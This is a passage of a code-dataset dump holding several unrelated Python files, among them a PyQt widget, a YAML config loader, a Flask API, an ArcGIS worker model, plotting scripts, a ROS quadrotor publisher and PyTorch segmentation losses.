QtWidgets.QDockWidget()\n dockWidget.setWindowTitle(\"Image Viewer\")\n \n image = QtGui.QImage('pyqt5/img_1.png')\n pixmap = QtGui.QPixmap.fromImage(image) \n label = QtWidgets.QLabel('testing', self)\n label.setPixmap(pixmap)\n\n #dockWidget.setWidget(pixmap)\n dockWidget.setWidget(label)\n dockWidget.setFloating(False)\n self.addDockWidget(Qt.RightDockWidgetArea, dockWidget)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myWidget = MainWindow()\n myWidget.show()\n\n sys.exit(app.exec_())","sub_path":"200609-01-qdock.py","file_name":"200609-01-qdock.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"299802642","text":"from __future__ import print_function\n\nimport sys\nimport os\nimport logging\nimport yaml\nfrom fnmatch import fnmatch\n\nfrom .files import MinipipeFilesMixin\nfrom .items import MinipipeItemsMixin\n\n__all__ = [\n 'delete_modules',\n 'Minipipe',\n 'MinipipeConfig',\n 'MinipipeUtil',\n]\n\nLOG = logging.getLogger('minipipe')\n\n\ndef delete_modules(pattern, verbose=True):\n \"\"\"\n Delete all existing python modules that match\n the given pattern.\n\n Args:\n pattern: A str pattern to match against module names\n verbose: A bool, when true, prints each module that is deleted\n \"\"\"\n mods = sys.modules.keys()\n matching_mods = [mod for mod in mods if fnmatch(mod, pattern)]\n for mod in matching_mods:\n if verbose:\n print('Deleting module: {0}'.format(mod))\n del sys.modules[mod]\n\n\ndef remove_prefix(name, prefix):\n if name.startswith(prefix):\n return name[len(prefix):]\n\n\nclass MinipipeConfig(dict):\n \"\"\"\n A config dictionary for a Minipipe project.\n\n A MinipipeConfig can be loaded using `load_config`\n which accepts any path as a starting point, and then\n searches upwards 
until a minipipe_config.yaml file\n is found. If no path is given, starts from the\n current working directory.\n\n Can be subclassed to change how the config file is\n found, such as modifying the default anypath.\n \"\"\"\n\n @classmethod\n def from_path(cls, anypath=None):\n inst = cls()\n inst.load_config(anypath)\n return inst\n\n def __init__(self, *args, **kwargs):\n super(MinipipeConfig, self).__init__(*args, **kwargs)\n self.config_filename = 'minipipe_config.yaml'\n self._has_attempted_load = False\n\n def has_attempted_load(self):\n return self._has_attempted_load\n\n def is_valid(self):\n return 'config_filepath' in self\n\n def get_default_anypath(self):\n \"\"\"\n Return the default path to use for anypath if none is given\n \"\"\"\n return os.getcwd()\n\n def find_config_file(self, anypath=None):\n \"\"\"\n Find and return the full path to the config file.\n\n Args:\n anypath: A string path anywhere in the project. If None, will use\n the default anypath (usually the current working directory)\n \"\"\"\n if not anypath:\n anypath = self.get_default_anypath()\n\n filepath = Minipipe.find_file_upwards(\n self.config_filename, anypath)\n\n return filepath\n\n def load_config(self, anypath=None):\n \"\"\"\n Load a config file by searching for it using any path.\n\n Args:\n anypath: A string path anywhere in the project. If None, will use\n the default anypath (usually the current working directory)\n \"\"\"\n self.clear()\n self._has_attempted_load = True\n\n config_filepath = self.find_config_file(anypath)\n if not config_filepath:\n LOG.warning('Failed to find {0} from path: {1}'.format(\n self.config_filename, anypath))\n return\n\n with open(config_filepath, 'rb') as fp:\n loaded_config = yaml.load(fp)\n\n # TODO: better error handling of failed config load\n\n if loaded_config is not None:\n self.update(loaded_config)\n self.post_load_config(config_filepath)\n else:\n LOG.warning(\n \"Failed to load minipipe config: {0}\".format(config_filepath))\n\n def post_load_config(self, filepath):\n \"\"\"\n Apply any modifications to the config after it is loaded.\n Config will not be None when this is called.\n \"\"\"\n # store config filepath and dirpath\n self['config_filepath'] = filepath\n dirpath = os.path.dirname(filepath)\n self['config_dirpath'] = dirpath\n\n # evaluate full paths from '_relpath' keys\n keys = list(self.keys())\n for key in keys:\n if key.endswith('_relpath'):\n # add new key with _path suffix\n self[key[:-8] + '_path'] = Minipipe.join_path(\n dirpath, self[key])\n elif key.endswith('.relpath'):\n # add new key with _path suffix\n self[key[:-8] + '.path'] = Minipipe.join_path(\n dirpath, self[key])\n\n\nclass MinipipeUtil(object):\n \"\"\"\n The base class for any object that uses a MinipipeConfig.\n \"\"\"\n\n def __init__(self, config=None):\n \"\"\"\n Args:\n config: A MinipipeConfig or MinipipeUtil. If given a config,\n will use the config instance directly, if given a util,\n will use the config of that util when accessing.\n \"\"\"\n self._config = None\n self.parent = None\n if isinstance(config, MinipipeConfig):\n self._config = config\n elif isinstance(config, MinipipeUtil):\n self.parent = config\n\n def create_config(self):\n \"\"\"\n Create and return a new MinipipeConfig for this util.\n \"\"\"\n config = MinipipeConfig()\n self.init_config(config)\n return config\n\n def init_config(self, config):\n \"\"\"\n Initialize a newly created MinipipeConfig. 
This is an\n opportunity to load the config from a specific path,\n or modify other settings.\n \"\"\"\n pass\n\n def _get_config(self):\n \"\"\"\n Return the MinipipeConfig for this util.\n \"\"\"\n if self.parent:\n return self.parent._get_config()\n else:\n if not self._config:\n self._config = self.create_config()\n return self._config\n\n def get_config(self):\n \"\"\"\n Return the Minipipe instance for this util.\n\n Attempts to automatically load the config if it\n hasn't been loaded yet.\n \"\"\"\n config = self._get_config()\n if not config.has_attempted_load():\n LOG.info(\"Auto-loading MinipipeUtil config, it is recommended \"\n \"that load_config be called explicitly before use\")\n config.load_config()\n return config\n\n def load_config(self, anypath=None):\n mp = self._get_config()\n mp.load_config(anypath)\n\n @property\n def config(self):\n return self.get_config()\n\n def config_format(self, string_fmt):\n \"\"\"\n Format a string with the MinipipeConfig of this util.\n Modifies the format string to convert '{my.key}' into '{0[my.key]}'\n so that config keys with dots to not break the formatting.\n \"\"\"\n fixed_fmt = string_fmt.replace('{', '{0[').replace('}', ']}')\n return fixed_fmt.format(self.config)\n\n\nclass Minipipe(MinipipeUtil,\n MinipipeFilesMixin,\n MinipipeItemsMixin):\n \"\"\"\n A MinipipeUtil with many core methods for common functionality\n including path and file management.\n \"\"\"\n\n def titlecase(self, name):\n \"\"\"\n Convert a name to TitleCase\n\n Args:\n name: A string name\n \"\"\"\n title_keywords = self.config.get('titlecase_keywords', [])\n if name.upper() in title_keywords:\n return name.upper()\n if len(name):\n return name[0].upper() + name[1:]\n return name\n\n def titlecase_path(self, path):\n \"\"\"\n Convert an any case path to a TitleCase path.\n\n Args:\n path: A string path\n \"\"\"\n items = path.replace('\\\\', '/').split('/')\n title_items = [self.titlecase(item) for item in items]\n return self.join_path(*title_items)\n\n\nfuncs = [\n remove_prefix\n]\nfor func in funcs:\n setattr(Minipipe, func.__name__, staticmethod(func))\n","sub_path":"src/minipipe/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"38518079","text":"class Context(dict):\n def __init__(self, content=None, parent=None):\n self.parent = parent\n if content is None:\n content = {}\n dict.__init__(self, content)\n\n def __getitem__(self, which):\n try:\n return dict.__getitem__(self, which)\n except KeyError as err:\n if self.parent is not None:\n return self.parent[which]\n raise err\n\n def child(self):\n return Context(parent=self)\n\n def get(self, what, default=None):\n result = dict.get(self, what, default)\n if result is None and self.parent is not None:\n result = self.parent.get(what, default)\n return result\n\n\ndef default_context():\n from srl import ast\n return {\n \"digit\": ast.Digit(),\n \"letter\": ast.Letter(),\n \"whitespace\": ast.Whitespace(),\n }\n","sub_path":"srl/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138348188","text":"from pwn import *\nobjects = []\n\nobjects_num = objects.__len__()\nobjects_string = reduce(lambda x, y: x + p32(y.__len__()) + y, objects, \"\")\nobjects_total_length = objects_string.__len__()\nanimation = p32(0)\nbinary = p32(objects_num)\nbinary += 
p32(objects_total_length)\nbinary += animation\nbinary += objects_string\nopen(\"test_files/no_object_and_animation\", \"w\").write(binary)\n","sub_path":"test_files/for_generates/no_object_and_animation.py","file_name":"no_object_and_animation.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409498422","text":"from flask_cors import CORS\n\nimport helpers\nimport logging\nfrom api import settings\nfrom flask import Flask, render_template, jsonify\nfrom flask_migrate import Migrate\nfrom werkzeug.debug import get_current_traceback\nfrom models import db\nfrom request_helpers import recover_identity\nfrom api.proposals import register_endpoints as register_proposal_endpoints\nfrom api.identities import register_endpoints as register_identity_endpoints\nfrom api.sessions import register_endpoints as register_session_endpoints\nfrom api.statistics import register_endpoints as register_statistic_endpoints\nfrom api.affiliates import register_endpoints as register_affiliates_endpoints\nfrom api.mobile import register_endpoints as register_mobile_endpoints\n\nif not settings.DISABLE_LOGS:\n helpers.setup_logger()\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Enable to print SQL statements using get_debug_queries.\n# app.config['SQLALCHEMY_RECORD_QUERIES'] = True\n#\n# Usage example inside endpoints.\n# for info in get_debug_queries():\n# print(info.statement, info.parameters, info.duration, sep='\\n')\n# print('\\n')\n\nCORS(app, resources=[r'/v1/affiliates'])\nregister_proposal_endpoints(app)\nregister_identity_endpoints(app)\nregister_session_endpoints(app)\nregister_statistic_endpoints(app)\nregister_affiliates_endpoints(app)\nregister_mobile_endpoints(app)\n\n\ndef _generate_database_uri(db_config):\n return 'mysql+pymysql://{}:{}@{}/{}'.format(\n db_config['user'], db_config['passwd'], db_config['host'],\n db_config['name'])\n\n\napp.config['SQLALCHEMY_DATABASE_URI'] =\\\n _generate_database_uri(settings.DB_CONFIG)\n\n\nmigrate = Migrate(app, db)\n\n\n# TODO: move to authorization.py\n@app.route('/', methods=['GET'])\ndef home():\n return render_template(\n 'api.html',\n )\n\n\n# End Point example which recovers public address from signed payload\n@app.route('/v1/me', methods=['GET'])\n@recover_identity\ndef test_signed_payload(caller_identity):\n return jsonify({\n 'identity': caller_identity\n })\n\n\n@app.errorhandler(404)\ndef method_not_found(e):\n return jsonify(error='unknown API method'), 404\n\n\n@app.errorhandler(405)\ndef method_not_allowed(e):\n return jsonify(error='method not allowed'), 405\n\n\n@app.errorhandler(Exception)\ndef handle_error(e):\n track = get_current_traceback(\n skip=1,\n show_hidden_frames=True,\n ignore_system_exceptions=False\n )\n logging.error(track.plaintext)\n return jsonify(error=str(e)), 500\n\n\ndef start_debug_app():\n init_db()\n app.run(debug=True)\n\n\ndef init_db():\n db.init_app(app)\n\n\nif __name__ == '__main__':\n start_debug_app()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"586934858","text":"\"\"\" Defines the Worker class.\r\n\"\"\"\r\n\r\nfrom ..workforce import _store\r\nfrom .exceptions import ValidationError\r\nfrom .feature_model import FeatureModel\r\nfrom ._store import *\r\nfrom ._schemas import WorkerSchema\r\n\r\n\r\nclass Worker(FeatureModel):\r\n 
\"\"\"\r\n Represents a worker in a Workforce Project\r\n\r\n ================== ====================================================================\r\n **Argument** **Description**\r\n ------------------ --------------------------------------------------------------------\r\n project Required :class:`~arcgis.apps.workforce.Project`. The project that\r\n the worker belongs to.\r\n ------------------ --------------------------------------------------------------------\r\n feature Optional :class:`~arcgis.features.Feature`. The feature representing\r\n the worker. Mostly intended for\r\n internal usage. If supplied, other parameters are ignored.\r\n ------------------ --------------------------------------------------------------------\r\n geometry Optional :class:`Dict`. The geometry of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n contact_number Optional :class:`String`. The contact number of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n name Optional :class:`String`. The name of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n notes Optional :class:`String`. The notes about the worker.\r\n ------------------ --------------------------------------------------------------------\r\n status Optional :class:`String`. The status of the worker.\r\n\r\n `not_working`, `working`, `on_break`\r\n ------------------ --------------------------------------------------------------------\r\n title Optional :class:`String`. The title of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n user_id Optional :class:`String`. The user id of the worker\r\n ================== ====================================================================\r\n\r\n \"\"\"\r\n\r\n def __init__(self, project, feature=None, geometry=None, contact_number=None,\r\n name=None, notes=None, status=\"not_working\", title=None, user_id=None):\r\n super().__init__(project, project.workers_layer, feature)\r\n self._schema = WorkerSchema(project.workers_layer)\r\n if not feature:\r\n self.geometry = geometry\r\n self.contact_number = contact_number\r\n self.name = name\r\n self.notes = notes\r\n self.status = status\r\n self.title = title\r\n self.user_id = user_id\r\n\r\n def __str__(self):\r\n return \"{} ({})\".format(self.name, self.user_id)\r\n\r\n def __repr__(self):\r\n return \"\".format(self.object_id)\r\n\r\n def update(self, geometry=None, contact_number=None,\r\n name=None, notes=None, status=None, title=None, user_id=None):\r\n \"\"\"\r\n Updates the worker on the server\r\n\r\n ================== ====================================================================\r\n **Argument** **Description**\r\n ------------------ --------------------------------------------------------------------\r\n geometry Optional :class:`Dict`. The geometry of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n contact_number Optional :class:`String`. The contact number of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n name Optional :class:`String`. The name of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n notes Optional :class:`String`. 
The notes about the worker.\r\n ------------------ --------------------------------------------------------------------\r\n status Optional :class:`String`. The status of the worker.\r\n\r\n `not_working`, `working`, `on_break`\r\n ------------------ --------------------------------------------------------------------\r\n title Optional :class:`String`. The title of the worker.\r\n ------------------ --------------------------------------------------------------------\r\n user_id Optional :class:`String`. The user id of the worker\r\n ================== ====================================================================\r\n\r\n \"\"\"\r\n update_worker(self.project, self, geometry, contact_number, name, notes, status, title, user_id)\r\n\r\n def delete(self):\r\n \"\"\"Deletes the worker from the server\"\"\"\r\n delete_workers(self.project, [self])\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Gets/Sets the name of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.name)\r\n\r\n @name.setter\r\n def name(self, value):\r\n self._feature.attributes[self._schema.name] = value\r\n\r\n @property\r\n def contact_number(self):\r\n \"\"\"Gets/Sets the contact number of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.contact_number)\r\n\r\n @contact_number.setter\r\n def contact_number(self, value):\r\n self._feature.attributes[self._schema.contact_number] = value\r\n\r\n @property\r\n def title(self):\r\n \"\"\"Gets/Sets the title of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.title)\r\n\r\n @title.setter\r\n def title(self, value):\r\n self._feature.attributes[self._schema.title] = value\r\n\r\n @property\r\n def notes(self):\r\n \"\"\"Gets/Sets the notes of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.notes)\r\n\r\n @notes.setter\r\n def notes(self, value):\r\n self._feature.attributes[self._schema.notes] = value\r\n\r\n @property\r\n def user_id(self):\r\n \"\"\"Gets/Sets the user id of the worker\"\"\"\r\n return self._feature.attributes.get(self._schema.user_id)\r\n\r\n @user_id.setter\r\n def user_id(self, value):\r\n self._feature.attributes[self._schema.user_id] = value\r\n\r\n @property\r\n def status(self):\r\n \"\"\"\r\n Gets/Sets the :class:`String` status of the worker\r\n\r\n `not_working`, `working`, `on_break`\r\n \"\"\"\r\n lut = {\r\n 0: \"not_working\",\r\n 1: \"working\",\r\n 2: \"on_break\",\r\n }\r\n if self._feature.attributes[self._schema.status] is not None:\r\n return lut[self._feature.attributes[self._schema.status]]\r\n else:\r\n return None\r\n\r\n @status.setter\r\n def status(self, value):\r\n if (isinstance(value, int) and value >= 0 and value <= 2) or value is None:\r\n self._feature.attributes[self._schema.status] = value\r\n elif isinstance(value, str):\r\n reduced_str = value.lower().replace(\" \", \"\").replace(\"_\", \"\")\r\n if reduced_str == \"notworking\":\r\n self._feature.attributes[self._schema.status] = 0\r\n elif reduced_str == \"working\":\r\n self._feature.attributes[self._schema.status] = 1\r\n elif reduced_str == \"onbreak\":\r\n self._feature.attributes[self._schema.status] = 2\r\n else:\r\n raise ValidationError(\"Invalid status\", self)\r\n else:\r\n raise ValidationError(\"Invalid status\", self)\r\n\r\n @FeatureModel.geometry.setter\r\n def geometry(self, value):\r\n self._feature.geometry = value\r\n\r\n def _validate(self, **kwargs):\r\n \"\"\"\r\n \"\"\"\r\n errors = super()._validate(**kwargs)\r\n errors += self._validate_name()\r\n errors += 
self._validate_status()\r\n errors += self._validate_user_id()\r\n return errors\r\n\r\n def _validate_for_add(self, **kwargs):\r\n errors = super()._validate_for_add(**kwargs)\r\n errors += self._validate_user_id_on_server()\r\n return errors\r\n\r\n def _validate_for_update(self, **kwargs):\r\n errors = super()._validate_for_update(**kwargs)\r\n errors += self._validate_user_id_on_server()\r\n return errors\r\n\r\n def _validate_for_remove(self, **kwargs):\r\n errors = super()._validate_for_remove(**kwargs)\r\n assignments = _store.query_assignments(self.project, \"{} = {}\".format(self.project._assignment_schema.worker_id, self.object_id))\r\n if assignments:\r\n errors.append(ValidationError(\"Cannot remove a Worker that has assignments\", self))\r\n return errors\r\n\r\n def _validate_name(self):\r\n errors = []\r\n if not self.name or self.name.isspace():\r\n errors.append(ValidationError(\"Worker cannot have an empty name\", self))\r\n return errors\r\n\r\n def _validate_status(self):\r\n errors = []\r\n if self.status is None:\r\n errors.append(ValidationError(\"Worker must have a status\", self))\r\n return errors\r\n\r\n def _validate_user_id(self):\r\n errors = []\r\n if not self.user_id or self.user_id.isspace():\r\n errors.append(ValidationError(\"Worker cannot have an empty user_id\", self))\r\n return errors\r\n\r\n def _validate_user_id_on_server(self):\r\n errors = []\r\n user = self.project.gis.users.get(self.user_id)\r\n if user is None:\r\n message = \"The Worker user_id must match an accessible named user id\"\r\n errors.append(ValidationError(message, self))\r\n\r\n workers = [w for w in self.project._cached_workers.values() if w.user_id == self.user_id]\r\n duplicate_workers = [w for w in workers if w.object_id != self.object_id]\r\n if duplicate_workers:\r\n message = \"There cannot be multiple Workers with the same user_id\"\r\n errors.append(ValidationError(message, self))\r\n return errors\r\n","sub_path":"arcpyenv/arcgispro-py3-clone/Lib/site-packages/arcgis/apps/workforce/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":10416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112691110","text":"#!/usr/bin/python\n\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nsample_data = 1\nnsamp = 10000*sample_data\ndt = 1e-3\ndtSamp = dt*nsamp\n\n# Mean square displacment\nindata = np.loadtxt('msd_post.txt',dtype=float)\n\nd = indata.shape[1] # dimensions\nN = indata.shape[0] # number of data points\n\nt = np.zeros(N)\nfor i in np.arange(N):\n t[i] = indata[i][0]\n\nv = np.zeros(N)\nfor i in np.arange(N):\n v[i] = indata[i][1]/((2*20/np.pi)*(2*20/np.pi))\n\nplt.figure(figsize=(12,10))\n\nfig = plt.subplot(211)\nplt.plot(t,v)\nplt.ylabel('$<\\\\Delta r^{2}>/4R^2$',fontsize=30)\nplt.title('Mean square displacement',fontsize=35,fontweight='bold')\nfig.tick_params(axis='both', which='major', labelsize=20)\n\nfig = plt.subplot(212)\nplt.loglog(t,v)\nplt.xlabel('$\\\\Delta t$',fontsize=30)\nplt.ylabel('$<\\\\Delta r^{2}>/4R^2$',fontsize=30)\nfig.tick_params(axis='both', which='major', labelsize=20)\n\nplt.savefig('msd_post.png',bbox_inches='tight')\n\n\n# Plot exponent coefficients\nindata = np.loadtxt('msd_post.txt',dtype=float)\n\nd = indata.shape[1] # dimensions\nN = indata.shape[0] # number of data points\n\nt = np.zeros(N)\nfor i in np.arange(N):\n t[i] = indata[i][0]\n\nv = np.zeros(N)\nfor i in np.arange(N):\n v[i] = indata[i][1]\n\nt_log = 
np.log(t[1:np.size(t)])\nmsd_log = np.log(v[1:np.size(v)])\negim_offset = 10\nN = 90\negim = np.zeros(N)\nt_egim = np.zeros(N)\ni = 0\nfor i in np.arange(N):\n coef = np.polyfit(t_log[i:i+egim_offset],msd_log[i:i+egim_offset],1)\n egim[i] = coef[0]\n t_egim[i] = dtSamp*i\n\nplt.figure(figsize=(12,10))\nfig = plt.subplot(111)\nplt.plot(t_egim,egim,'o')\nplt.title('Exponent fits within a window of %s' %(egim_offset), fontsize=20,fontweight='bold')\nplt.xlabel('t',fontsize=20)\nplt.ylabel('$\\\\alpha$',fontsize=20)\nfig.tick_params(axis='both', which='major', labelsize=20)\n\nplt.savefig('exponents.png',bbox_inches='tight')\n\n","sub_path":"OldCellAnalysis/New_found/plot_sampling.py","file_name":"plot_sampling.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"203313135","text":"from geometry_msgs.msg import Twist\n\nclass Quadrotor:\n \"\"\"\n Holds all information about a quadrotor and can control the quadrotor\n completely\n \"\"\"\n def __init__(self):\n self.pos = [0, 0, 0]\n self.vel = [0, 0, 0]\n self.acc = [0, 0, 0]\n\n self.ang = [0, 0, 0]\n self.ang_vel = [0, 0, 0]\n self.ang_acc = [0, 0, 0]\n\n self.publisher = rospy.Publisher('cmd_vel', Twist, queue_size=10)\n\n def send(self):\n \"\"\"\n Makes a Twist message and sends it\n \"\"\"\n msg = Twist()\n\n msg.linear.x = self.vel[0]\n msg.linear.y = self.vel[1]\n msg.linear.z = self.vel[2]\n msg.angular.x = self.ang_vel[0]\n msg.angular.y = self.ang_vel[1]\n msg.angular.z = self.ang_vel[2]\n\n self.publisher.publish(msg)","sub_path":"hector_keyboard_controller/scripts/quadrotor/Quadrotor.py","file_name":"Quadrotor.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"221643476","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n\r\nSpyder Editor\r\n\r\n\r\n\r\nThis is a temporary script file.\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\nimport pylab as plt\r\n\r\nfrom PIL import Image\r\n\r\nimport math\r\nI = Image.open( \"..//images/161062.jpg\")\r\n#I = Image.open( \"C://Users/tianzixie/Desktop/1610621.jpg\")\r\n#imgsrc = \"https://www2.eecs.berkeley.edu/Research/Projects/CS/vision/bsds/BSDS300/html/images/plain/normal/gray/161062.jpg\"\r\n#from skimage import io\r\n#I = io.imread(imgsrc)\r\n\r\nimgArr = np.array(I)\r\n\r\nimgArrr=np.array(I)\r\n\r\nImage.fromarray(imgArr).show()\r\n\r\nhis = np.zeros(256)\r\n\r\nprob = np.zeros(256)\r\n\r\n#create array\r\n\r\nfor i in range(imgArr.shape[0]):\r\n\r\n for j in range(imgArr.shape[1]):\r\n\r\n his[imgArr[i, j]] = his[imgArr[i, j]] + 1\r\n\r\nfor i in range(256):\r\n\r\n prob[i]=his[i]/(imgArr.shape[0]*imgArr.shape[1])\r\n\r\nplt.plot(prob)\r\n\r\nplt.show()\r\n\r\n#show a picture of probability before operation\r\n\r\nplt.plot(his)\r\n\r\nplt.show()\r\n\r\n#show a histogram before operation\r\n\r\nE=0\r\n\r\nC=0\r\n\r\nfor j in range(256):\r\n\r\n A=0\r\n\r\n B=0\r\n\r\n \r\n\r\n for i in range(j):\r\n\r\n if prob[i]>0:\r\n\r\n A=A-prob[i]*math.log(prob[i])\r\n\r\n for i in range(256-j):\r\n\r\n if prob[i]>0:\r\n\r\n B=B-prob[i]*math.log(prob[i])\r\n\r\n if C<(A+B):\r\n\r\n C=A+B\r\n\r\n D=j\r\n\r\ncu=np.zeros(256)\r\n\r\nfor i in range(256):\r\n\r\n if i==0:\r\n\r\n cu[i]=prob[i]*255\r\n\r\n else:\r\n\r\n cu[i]=cu[i-1]+prob[i]*255 \r\n\r\nP=0\r\n\r\nfor i in range(imgArrr.shape[0]):\r\n\r\n for j in range(imgArrr.shape[1]):\r\n\r\n a= cu[imgArrr[i,j]]+0.5 \r\n\r\n 
imgArrr[i,j]=int(a)\r\n\r\n#operation\r\n\r\nImage.fromarray(imgArrr).show() \r\n\r\nhis2 = np.zeros(256)\r\n\r\nprob = np.zeros(256) \r\n\r\nfor i in range(imgArr.shape[0]):\r\n\r\n for j in range(imgArr.shape[1]):\r\n\r\n his2[imgArrr[i, j]] = his2[imgArrr[i, j]] + 1 \r\n\r\nfor i in range(256):\r\n\r\n prob[i]=his2[i]/(imgArr.shape[0]*imgArr.shape[1])\r\n\r\nplt.plot(prob)\r\n\r\nplt.show()\r\n\r\n#show a picture of probability after operation\r\n\r\nplt.plot(his2)\r\n\r\nplt.show()\r\n\r\n#show a histogram after operation","sub_path":"Answers/code/Ansewer5_1.py","file_name":"Ansewer5_1.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"542177195","text":"\"\"\"\nDescription\n++++++++++++++++++++++\nAddition losses module defines classses which are commonly used particularly in segmentation and are not part of standard pytorch library.\n\nUsage\n++++++++++++++++++++++\nImport the package and Instantiate any loss class you want to you::\n\n from nn_common_modules import losses as additional_losses\n loss = additional_losses.DiceLoss()\n\n Note: If you use DiceLoss, insert Softmax layer in the architecture. In case of combined loss, do not put softmax as it is in-built\n\nMembers\n++++++++++++++++++++++\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.modules.loss import _Loss, _WeightedLoss\nimport numpy as np\nfrom torch.autograd import Variable\n\n\nclass DiceLoss(_WeightedLoss):\n \"\"\"\n Dice Loss for a batch of samples\n \"\"\"\n\n def forward(self, output, target, weights=None, ignore_index=None, binary=False):\n \"\"\"\n Forward pass\n\n :param output: NxCxHxW logits\n :param target: NxHxW LongTensor\n :param weights: C FloatTensor\n :param ignore_index: int index to ignore from loss\n :param binary: bool for binarized one chaneel(C=1) input\n :return: torch.tensor\n \"\"\"\n output = F.softmax(output, dim=1)\n if binary:\n return self._dice_loss_binary(output, target)\n return self._dice_loss_multichannel(output, target, weights, ignore_index)\n\n @staticmethod\n def _dice_loss_binary(output, target):\n \"\"\"\n Dice loss for one channel binarized input\n\n :param output: Nx1xHxW logits\n :param target: NxHxW LongTensor\n :return:\n \"\"\"\n eps = 0.0001\n\n intersection = output * target\n numerator = 2 * intersection.sum(0).sum(1).sum(1)\n denominator = output + target\n denominator = denominator.sum(0).sum(1).sum(1) + eps\n loss_per_channel = 1 - (numerator / denominator)\n\n return loss_per_channel.sum() / output.size(1)\n\n @staticmethod\n def _dice_loss_multichannel(output, target, weights=None, ignore_index=None):\n \"\"\"\n Forward pass\n\n :param output: NxCxHxW Variable\n :param target: NxHxW LongTensor\n :param weights: C FloatTensor\n :param ignore_index: int index to ignore from loss\n :param binary: bool for binarized one chaneel(C=1) input\n :return:\n \"\"\"\n eps = 0.0001\n encoded_target = output.detach() * 0\n\n if ignore_index is not None:\n mask = target == ignore_index\n target = target.clone()\n target[mask] = 0\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n mask = mask.unsqueeze(1).expand_as(encoded_target)\n encoded_target[mask] = 0\n else:\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n\n if weights is None:\n weights = 1\n\n intersection = output * encoded_target\n numerator = 2 * intersection.sum(0).sum(1).sum(1)\n denominator = output + encoded_target\n\n if ignore_index is not None:\n 
denominator[mask] = 0\n denominator = denominator.sum(0).sum(1).sum(1) + eps\n loss_per_channel = weights * (1 - (numerator / denominator))\n\n return loss_per_channel.sum() / output.size(1)\n\n\nclass IoULoss(_WeightedLoss):\n \"\"\"\n IoU Loss for a batch of samples\n \"\"\"\n\n def forward(self, output, target, weights=None, ignore_index=None):\n \"\"\"Forward pass\n \n :param output: shape = NxCxHxW\n :type output: torch.tensor [FloatTensor]\n :param target: shape = NxHxW\n :type target: torch.tensor [LongTensor]\n :param weights: shape = C, defaults to None\n :type weights: torch.tensor [FloatTensor], optional\n :param ignore_index: index to ignore from loss, defaults to None\n :type ignore_index: int, optional\n :return: loss value\n :rtype: torch.tensor\n \"\"\"\n\n output = F.softmax(output, dim=1)\n\n eps = 0.0001\n encoded_target = output.detach() * 0\n\n if ignore_index is not None:\n mask = target == ignore_index\n target = target.clone()\n target[mask] = 0\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n mask = mask.unsqueeze(1).expand_as(encoded_target)\n encoded_target[mask] = 0\n else:\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n\n if weights is None:\n weights = 1\n\n intersection = output * encoded_target\n numerator = intersection.sum(0).sum(1).sum(1)\n denominator = (output + encoded_target) - (output * encoded_target)\n\n if ignore_index is not None:\n denominator[mask] = 0\n denominator = denominator.sum(0).sum(1).sum(1) + eps\n loss_per_channel = weights * (1 - (numerator / denominator))\n\n return loss_per_channel.sum() / output.size(1)\n\n\nclass CrossEntropyLoss2d(_WeightedLoss):\n \"\"\"\n Standard pytorch weighted nn.CrossEntropyLoss\n \"\"\"\n\n def __init__(self, weight=None):\n super(CrossEntropyLoss2d, self).__init__()\n self.nll_loss = nn.CrossEntropyLoss(weight)\n\n def forward(self, inputs, targets):\n \"\"\"\n Forward pass\n\n :param inputs: torch.tensor (NxC)\n :param targets: torch.tensor (N)\n :return: scalar\n \"\"\"\n return self.nll_loss(inputs, targets)\n\n\nclass CombinedLoss(_Loss):\n \"\"\"\n A combination of dice and cross entropy loss\n \"\"\"\n\n def __init__(self):\n super(CombinedLoss, self).__init__()\n self.cross_entropy_loss = CrossEntropyLoss2d()\n self.dice_loss = DiceLoss()\n self.focal_loss = FocalLoss()\n self.l2_loss = nn.MSELoss()\n\n def forward(self, input, target, weight=None):\n \"\"\"\n Forward pass\n\n :param input: torch.tensor (NxCxHxW)\n :param target: torch.tensor (NxHxW)\n :param weight: torch.tensor (NxHxW)\n 